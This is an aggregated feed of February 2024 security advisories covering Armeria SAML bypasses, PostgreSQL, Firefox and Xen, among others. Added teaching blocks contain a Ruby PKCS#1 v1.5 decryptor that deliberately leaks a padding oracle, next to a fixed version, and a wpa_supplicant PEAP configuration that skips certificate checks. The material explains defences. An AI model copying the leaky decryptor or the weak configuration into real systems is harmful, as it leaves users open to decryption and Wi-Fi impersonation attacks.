26.02.2024 22:04:52maven[MAVEN:GHSA-HX5Q-V6PJ-533R] SAML authentication bypass due to missing validation on unsigned SAML messages (critical)### ImpactWhen SAML is used as the authentication mechanism, Central Dogma accepts unsigned SAML messages (assertions, logout requests, etc.) as they are, rather than rejecting them by default. As a result, an attacker can forge a SAML message to authenticate themselves, despite the fact that such an unsigned SAML message should be rejected.### PatchesThe vulnerability has been patched in Central Dogma 0.64.3 by updating its Armeria dependency to 1.27.2. All users who use SAML as the authentication mechanism must upgrade to 0.64.3 or later.### WorkaroundsA user can manually upgrade the `armeria-saml` module with the one from Armeria 1.27.2 or later, either by replacing the JAR in the Central Dogma distribution or by updating the dependency tree of the build.### References[`SamlMessageUtil.validateSignature()`](https://github.com/line/armeria/blob/0efc776988d71be4da6e506ec8a33c2b7b43f567/saml/src/main/java/com/linecorp/armeria/server/saml/SamlMessageUtil.java#L160-L163)https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HX5Q-V6PJ-533R
26.02.2024 22:04:42maven[MAVEN:GHSA-4M6J-23P2-8C54] Armeria SAML authentication bypass due to missing validation on unsigned SAML messages (critical)### ImpactThe SAML implementation provided by `armeria-saml` currently accepts unsigned SAML messages (assertions, logout requests, etc.) as they are, rather than rejecting them by default. As a result, an attacker can forge a SAML message to authenticate themselves, despite the fact that such an unsigned SAML message should be rejected.### PatchesThe vulnerability has been patched in Armeria version 1.27.2. All users who rely on `armeria-saml` older than version 1.27.2 must upgrade to 1.27.2 or later.### WorkaroundsThere is no known workaround for this vulnerability.### References[`SamlMessageUtil.validateSignature()`](https://github.com/line/armeria/blob/0efc776988d71be4da6e506ec8a33c2b7b43f567/saml/src/main/java/com/linecorp/armeria/server/saml/SamlMessageUtil.java#L160-L163)https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4M6J-23P2-8C54
26.02.2024 22:01:29npm[NPM:GHSA-4GMJ-3P3H-GM8H] es5-ext vulnerable to Regular Expression Denial of Service in `function#copy` and `function#toStringTokens` (low)### ImpactPassing functions with very long names or complex default argument names into `function#copy` or `function#toStringTokens` may cause the script to stall.### PatchesFixed with https://github.com/medikoo/es5-ext/commit/3551cdd7b2db08b1632841f819d008757d28e8e2 and https://github.com/medikoo/es5-ext/commit/a52e95736690ad1d465ebcd9791d54570e294602 Published with v0.10.63### WorkaroundsNo real workaround aside from refraining from using the above utilities.### References https://github.com/medikoo/es5-ext/issues/201 https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4GMJ-3P3H-GM8H
26.02.2024 20:50:31ubuntu[USN-6659-1] libde265 vulnerabilities (high)Several security issues were fixed in libde265.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6659-1
26.02.2024 23:30:38maven[MAVEN:GHSA-QPXM-689R-3849] Apache Camel data exposure vulnerability (low)Exposure of sensitive data by crafting a malicious EventFactory and providing a custom ExchangeCreatedEvent that exposes sensitive data. Vulnerability in Apache Camel. This issue affects Apache Camel: from 3.21.X through 3.21.3, from 3.22.X through 3.22.0, from 4.0.X through 4.0.3, from 4.X through 4.3.0. Users are recommended to upgrade to version 3.21.4, 3.22.1, 4.0.4 or 4.4.0, which fixes the issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QPXM-689R-3849
26.02.2024 15:57:11ubuntu[USN-6658-1] libxml2 vulnerability (high)libxml2 could be made to crash or run programs if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6658-1
26.02.2024 15:52:13ubuntu[USN-6657-1] Dnsmasq vulnerabilities (high)Several security issues were fixed in Dnsmasq.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6657-1
26.02.2024 15:40:22ubuntu[USN-6656-1] PostgreSQL vulnerability (high)PostgreSQL could be made to run arbitrary SQL.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6656-1
26.02.2024 12:13:22ubuntu[USN-6655-1] GNU binutils vulnerabilities (high)Several security issues were fixed in GNU binutils.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6655-1
26.02.2024 05:46:59ubuntu[USN-6654-1] Roundcube Webmail vulnerability (medium)Roundcube Webmail could allow cross-site scripting (XSS) attacks.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6654-1
26.02.2024 02:00:00debian[DSA-5632-1] composer (high)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5632-1
26.02.2024 02:00:00gentoo[GLSA-202402-30] Glances: Arbitrary Code Execution (normal)A vulnerability has been found in Glances which may lead to arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-30
26.02.2024 02:00:00gentoo[GLSA-202402-31] GNU Aspell: Heap Buffer Overflow (normal)A vulnerability has been discovered in GNU Aspell which leads to a heap buffer overflow.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-31
26.02.2024 02:00:00gentoo[GLSA-202402-32] btrbk: Remote Code Execution (normal)A vulnerability has been discovered in btrbk which can lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-32
26.02.2024 02:00:00gentoo[GLSA-202402-33] PyYAML: Arbitrary Code Execution (normal)A vulnerability has been found in PyYAML which can lead to arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-33
26.02.2024 02:00:00oraclelinux[ELSA-2024-0950] postgresql:15 security update (important)pgaudit pg_repack postgres-decoderbufs postgresql [15.6-1]- update to 15.6- Fixes CVE-2024-0985https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0950
26.02.2024 02:00:00oraclelinux[ELSA-2024-0957] thunderbird security update (important)[115.8.0-1.0.1]- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js- Enabled aarch64 build[115.8.0-1]- Update to 115.8.0 build1https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0957
26.02.2024 02:00:00oraclelinux[ELSA-2024-0966] opensc security update (moderate)[0.23.0-4]- Fix CVE-2023-5992: Side-channel leaks while stripping encryption PKCS#1.5 paddinghttps://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0966
26.02.2024 02:00:00oraclelinux[ELSA-2024-0976] firefox security update (important)[115.8.0-1.0.1]- Remove upstream references [Orabug: 30143292]- Update distribution for Oracle Linux [Orabug: 30143292]- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file[115.8.0-1]- Update to 115.8.0 build1https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0976
26.02.2024 02:00:00redhat[RHSA-2024:0956] postgresql:10 security update (important)PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0956
26.02.2024 02:00:00redhat[RHSA-2024:0965] unbound security update (important)The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver. Security Fix(es):* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0965
26.02.2024 02:00:00redhat[RHSA-2024:0967] opensc security update (moderate)The OpenSC set of libraries and utilities provides support for working with smart cards. OpenSC focuses on cards that support cryptographic operations and enables their use for authentication, mail encryption, or digital signatures.Security Fix(es):* OpenSC: Side-channel leaks while stripping encryption PKCS#1 padding (CVE-2023-5992)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0967
26.02.2024 02:00:00redhat[RHSA-2024:0973] postgresql:15 security update (important)PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0973
26.02.2024 02:00:00redhat[RHSA-2024:0974] postgresql:12 security update (important)PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0974
26.02.2024 02:00:00redhat[RHSA-2024:0975] postgresql:13 security update (important)PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0975
26.02.2024 02:00:00redhat[RHSA-2024:0966] opensc security update (moderate)The OpenSC set of libraries and utilities provides support for working with smart cards. OpenSC focuses on cards that support cryptographic operations and enables their use for authentication, mail encryption, or digital signatures.Security Fix(es):* OpenSC: Side-channel leaks while stripping encryption PKCS#1 padding (CVE-2023-5992)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0966
26.02.2024 02:00:00redhat[RHSA-2024:0977] unbound security update (important)The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver. Security Fix(es):* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0977
26.02.2024 02:00:00redhat[RHSA-2024:0957] thunderbird security update (important)Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.8.0.Security Fix(es):* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0957
26.02.2024 02:00:00redhat[RHSA-2024:0976] firefox security update (important)Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.8.0 ESR.Security Fix(es):* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0976
26.02.2024 02:00:00redhat[RHSA-2024:0955] firefox security update (important)Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.8.0 ESR.Security Fix(es):* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0955
26.02.2024 02:00:00redhat[RHSA-2024:0964] thunderbird security update (important)Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.8.0.Security Fix(es):* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0964
26.02.2024 02:00:00redhat[RHSA-2024:0963] thunderbird security update (important)Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.8.0.Security Fix(es):* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0963
27.02.2024 23:54:16maven[MAVEN:GHSA-XH6M-7CR7-XX66] Missing permission checks on Hazelcast client protocol (high)
### Impact

In Hazelcast through 4.1.10, 4.2 through 4.2.8, 5.0 through 5.0.5, 5.1 through 5.1.7, 5.2 through 5.2.4, and 5.3 through 5.3.2, some client operations don't check permissions properly, allowing authenticated users to access data stored in the cluster.

### Patches

Fix versions: 5.2.5, 5.3.5, 5.4.0-BETA-1

### Workarounds

There is no known workaround.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XH6M-7CR7-XX66
27.02.2024 20:31:07ubuntu[USN-6644-2] LibTIFF vulnerabilities (high)Several security issues were fixed in LibTIFF.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6644-2
27.02.2024 23:54:40maven[MAVEN:GHSA-JW7R-RXFF-GV24] Apache James MIME4J improper input validation vulnerability (moderate)Improper input validation allows for header injection in the MIME4J library when using MIME4J DOM for composing a message. This can be exploited by an attacker to add unintended headers to MIME messages.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JW7R-RXFF-GV24
27.02.2024 23:53:34maven[MAVEN:GHSA-QRP9-23P7-G5MF] Apache Ambari XML External Entity injection (moderate)XML External Entity injection in Apache Ambari versions <= 2.7.7. Users are recommended to upgrade to version 2.7.8, which fixes this issue. More details: Oozie Workflow Scheduler had a vulnerability that allowed for root-level file reading and privilege escalation from low-privilege users. The vulnerability was caused by a lack of proper user input validation. This vulnerability is known as an XML External Entity (XXE) injection attack. Attackers can exploit XXE vulnerabilities to read arbitrary files on the server, including sensitive system files. In theory, it might be possible to use this to escalate privileges.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QRP9-23P7-G5MF
27.02.2024 18:47:13ubuntu[USN-6664-1] less vulnerabilityless could be made to crash or run arbitrary commands if it received a crafted input.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6664-1
27.02.2024 13:18:33ubuntu[USN-6663-1] OpenSSL updateAdd implicit rejection in PKCS#1 v1.5 in OpenSSL.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6663-1
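The OpenSC rows above (CVE-2023-5992, RHSA-2024:0966 and RHSA-2024:0967) and this OpenSSL update address the same bug class: a PKCS#1 v1.5 decryptor that behaves observably differently on bad padding gives an attacker a padding oracle of the Bleichenbacher kind. The Ruby below is an added example, not OpenSSL's or OpenSC's code. It puts the oracle-prone unpadding next to an implicit-rejection version that, when padding fails, returns a synthetic message derived from a key-bound secret and the ciphertext instead of signalling the failure. The toy RSA key (two Mersenne primes), the simplified KDF, and every name in the block are this example's own; Ruby cannot give constant-time guarantees, so the point is the control flow, not timing.

```ruby
# Added example, not OpenSSL's or OpenSC's code. A PKCS#1 v1.5 decryptor that
# signals bad padding (leaky_decrypt) next to one that practises implicit
# rejection (implicit_reject_decrypt). The toy RSA key uses two Mersenne primes
# so the block runs without OpenSSL; it is for illustration only.
require 'digest'
require 'securerandom'

class PaddingError < StandardError; end

P = (1 << 127) - 1   # Mersenne prime M127 (toy key, never use in practice)
Q = (1 << 89) - 1    # Mersenne prime M89
N = P * Q
E = 65537

# Extended Euclid; returns a^-1 mod m.
def mod_inverse(a, m)
  old_r, r = a % m, m
  old_s, s = 1, 0
  until r.zero?
    q = old_r / r
    old_r, r = r, old_r - q * r
    old_s, s = s, old_s - q * s
  end
  raise ArgumentError, 'not invertible' unless old_r == 1
  old_s % m
end

D = mod_inverse(E, (P - 1) * (Q - 1))
K = (N.bit_length + 7) / 8   # modulus length in bytes (27 for this toy key)
# Stand-in for the per-key secret real implementations derive from the private
# key; it keeps the synthetic message unpredictable without the key.
SECRET = Digest::SHA256.digest("toy-implicit-rejection-secret:#{D}")

def i2osp(x, len)
  [x.to_s(16).rjust(len * 2, '0')].pack('H*')
end

def os2ip(s)
  s.unpack1('H*').to_i(16)
end

def rsa_public(block)
  i2osp(os2ip(block).pow(E, N), K)
end

def rsa_private(ct)
  i2osp(os2ip(ct).pow(D, N), K)
end

# EME-PKCS1-v1_5 encoding: 00 || 02 || PS (>= 8 non-zero random bytes) || 00 || M
def pkcs1_encrypt(msg)
  raise ArgumentError, 'message too long' if msg.bytesize > K - 11
  ps = SecureRandom.random_bytes(K - 3 - msg.bytesize)
                   .bytes.map { |b| b.zero? ? 1 : b }.pack('C*')
  rsa_public("\x00\x02".b + ps + "\x00".b + msg.b)
end

# Oracle-prone: each distinct failure is observable (exception, timing), which
# is exactly what a Bleichenbacher-style attacker measures.
def leaky_decrypt(ct)
  em = rsa_private(ct)
  raise PaddingError, 'wrong block type' unless em.getbyte(0).zero? && em.getbyte(1) == 2
  sep = em.index("\x00".b, 2)
  raise PaddingError, 'no separator' if sep.nil?
  raise PaddingError, 'padding string too short' if sep < 10
  em.byteslice(sep + 1, K)
end

# Implicit rejection: always return *a* plaintext. On bad padding the result is
# a deterministic pseudo-random message derived from SECRET and the ciphertext,
# so the caller never learns that padding failed, and repeating the query with
# the same ciphertext yields the same answer, as a genuine decryption would.
def implicit_reject_decrypt(ct)
  em = rsa_private(ct)
  prf = Digest::SHA256.digest(SECRET + ct)
  synth_len = prf.getbyte(0) % (K - 10)   # 0 .. K-11, a plausible message length
  synthetic = Digest::SHA256.digest(prf + "\x01".b).byteslice(0, synth_len)

  # Evaluate every padding condition without early exits; fold into one flag.
  ok = em.getbyte(0).zero? & (em.getbyte(1) == 2)
  sep = nil
  (2...K).each { |i| sep = i if sep.nil? && em.getbyte(i).zero? }
  ok &= !sep.nil?
  ok &= (sep || 0) >= 10
  ok ? em.byteslice(sep + 1, K) : synthetic
end
```

Note that the implicit-rejection path computes the synthetic message before it knows whether it will be needed, and walks the whole block rather than stopping at the first separator: the two branches then do the same work, which is the property the patched libraries are after.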
27.02.2024 12:38:00xen[XSA-451] x86: shadow stack vs exceptions from emulation stubs
**ISSUE DESCRIPTION**

Recent x86 CPUs offer functionality named Control-flow Enforcement Technology (CET). A sub-feature of this is Shadow Stacks (CET-SS). CET-SS is a hardware feature designed to protect against Return Oriented Programming attacks. When enabled, traditional stacks holding both data and return addresses are accompanied by so called "shadow stacks", holding little more than return addresses. Shadow stacks aren't writable by normal instructions, and upon function returns their contents are used to check for possible manipulation of a return address coming from the traditional stack.

In particular certain memory accesses need intercepting by Xen. In various cases the necessary emulation involves a kind of replaying of the instruction. Such replaying typically involves filling and then invoking a stub. Such a replayed instruction may raise an exception, which is expected and dealt with accordingly.

Unfortunately the interaction of both of the above wasn't right: recovery involves removal of a call frame from the (traditional) stack. The counterpart of this operation for the shadow stack was missing.

**IMPACT**

An unprivileged guest can cause a hypervisor crash, causing a Denial of Service (DoS) of the entire host.

**VULNERABLE SYSTEMS**

Xen 4.14 and onwards are vulnerable. Xen 4.13 and older are not vulnerable.

Only x86 systems with CET-SS enabled are vulnerable. x86 systems with CET-SS unavailable or disabled are not vulnerable. Arm systems are not vulnerable. See https://xenbits.xen.org/docs/latest/faq.html#tell-if-cet-is-active for how to determine whether CET-SS is active.

Only HVM or PVH guests can leverage the vulnerability. PV guests cannot leverage the vulnerability.

https://secdb.nttzen.cloud/security-advisory/xen/XSA-451
27.02.2024 12:17:32ubuntu[USN-6305-2] PHP vulnerabilities (critical)Several security issues were fixed in PHP.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6305-2
28.02.2024 01:00:05maven[MAVEN:GHSA-PX7W-C9GW-7GJ3] Apache James server: Privilege escalation via JMX pre-authentication deserialization (moderate)
Apache James prior to version 3.7.5 and 3.8.0 exposes a JMX endpoint on localhost subject to pre-authentication deserialisation of untrusted data. Given a deserialisation gadget, this could be leveraged as part of an exploit chain that could result in privilege escalation. Note that by default the JMX endpoint is only bound locally.

We recommend users to:

- Upgrade to a non-vulnerable Apache James version
- Run Apache James isolated from other processes (docker - dedicated virtual machine)
- If possible turn off JMX

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PX7W-C9GW-7GJ3
28.02.2024 00:19:24rubysec[RUBYSEC:RACK-CORS-2024-27456] Rack CORS Middleware has Insecure File Permissionsrack-cors (aka Rack CORS Middleware) 2.0.1 has 0666 permissions for the .rb files.https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-CORS-2024-27456
28.02.2024 20:40:04slackware[SSA:2024-059-01] wpa_supplicant
New wpa_supplicant packages are available for Slackware 15.0 and -current to fix a security issue.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/wpa_supplicant-2.10-i586-2_slack15.0.txz: Rebuilt.
  Patched the implementation of PEAP in wpa_supplicant to prevent an
  authentication bypass. For a successful attack, wpa_supplicant must be
  configured to not verify the network's TLS certificate during Phase 1
  authentication, and an eap_peap_decrypt vulnerability can then be abused
  to skip Phase 2 authentication. The attack vector is sending an EAP-TLV
  Success packet instead of starting Phase 2. This allows an adversary to
  impersonate Enterprise Wi-Fi networks.
  For more information, see:
  https://www.cve.org/CVERecord?id=CVE-2023-52160
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/wpa_supplicant-2.10-i586-2_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/wpa_supplicant-2.10-x86_64-2_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/wpa_supplicant-2.10-i586-3.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/wpa_supplicant-2.10-x86_64-3.txz

**MD5 signatures**

Slackware 15.0 package:
2be83120eeae199735756d3ecfc9afd8  wpa_supplicant-2.10-i586-2_slack15.0.txz

Slackware x86_64 15.0 package:
2bcea46d6ae7cd861208fe92f08e44ce  wpa_supplicant-2.10-x86_64-2_slack15.0.txz

Slackware -current package:
d44e7e706bc44d6c2978e97bdf6299d3  n/wpa_supplicant-2.10-i586-3.txz

Slackware x86_64 -current package:
5bb12ec9109ef4dbb58b4a0276ccbcfa  n/wpa_supplicant-2.10-x86_64-3.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg wpa_supplicant-2.10-i586-2_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-059-01
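The ChangeLog entry above names the precondition for CVE-2023-52160: a PEAP network block that does not verify the server's TLS certificate in Phase 1. Upgrading the package is the fix; the fragment below is an added illustration, not from Slackware or the wpa_supplicant project, showing a network block that meets that precondition next to one that pins the RADIUS server's CA and name so a rogue access point cannot get through Phase 1 in the first place. SSID, identity, password and the certificate path are placeholders.

```conf
# Added example, not part of the Slackware advisory. wpa_supplicant.conf
# network blocks for an Enterprise (PEAP) network; all values are placeholders.

# WEAK: no ca_cert and no server-name match, so the Phase 1 TLS server
# certificate is never verified. Any AP presenting any certificate is accepted,
# which is the configuration the advisory says the bypass requires.
network={
    ssid="corp-wifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user@example.org"
    password="placeholder-password"
    phase2="auth=MSCHAPV2"
}

# FIXED: pin the issuing CA and require the server certificate to carry the
# expected name, so Phase 1 only succeeds against the real RADIUS server.
network={
    ssid="corp-wifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user@example.org"
    password="placeholder-password"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_match="radius.example.org"
    phase2="auth=MSCHAPV2"
}
```

The `domain_match` line is what stops a certificate that chains to the same public CA but names a different host; `ca_cert` alone is not enough when the CA is a public one.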
28.02.2024 20:18:33ubuntu[USN-6648-2] Linux kernel (Azure) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6648-2
28.02.2024 19:52:15ubuntu[USN-6653-2] Linux kernel (AWS) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6653-2
28.02.2024 19:12:46ubuntu[USN-6651-2] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6651-2
28.02.2024 18:00:00cisco[CISCO-SA-UCSFI-IMM-SYN-P6KZTDQC] Cisco UCS 6400 and 6500 Series Fabric Interconnects Intersight Managed Mode Denial of Service Vulnerability (medium)A vulnerability in system resource management in Cisco UCS 6400 and 6500 Series Fabric Interconnects that are in Intersight Managed Mode (IMM) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on the Device Console UI of an affected device.This vulnerability is due to insufficient rate-limiting of TCP connections to an affected device. An attacker could exploit this vulnerability by sending a high number of TCP packets to the Device Console UI. A successful exploit could allow an attacker to cause the Device Console UI process to crash, resulting in a DoS condition. A manual reload of the fabric interconnect is needed to restore complete functionality.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-UCSFI-IMM-SYN-P6KZTDQC
28.02.2024 18:00:00cisco[CISCO-SA-NXOS-PO-ACL-TKYEPGVL] Cisco Nexus 3000 and 9000 Series Switches Port Channel ACL Programming Vulnerability (medium)A vulnerability in the access control list (ACL) programming for port channel subinterfaces of Cisco Nexus 3000 and 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, remote attacker to send traffic that should be blocked through an affected device.This vulnerability is due to incorrect hardware programming that occurs when configuration changes are made to port channel member ports. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to access network resources that should be protected by an ACL that was applied on port channel subinterfaces.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the February 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: February 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75059"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-PO-ACL-TKYEPGVL
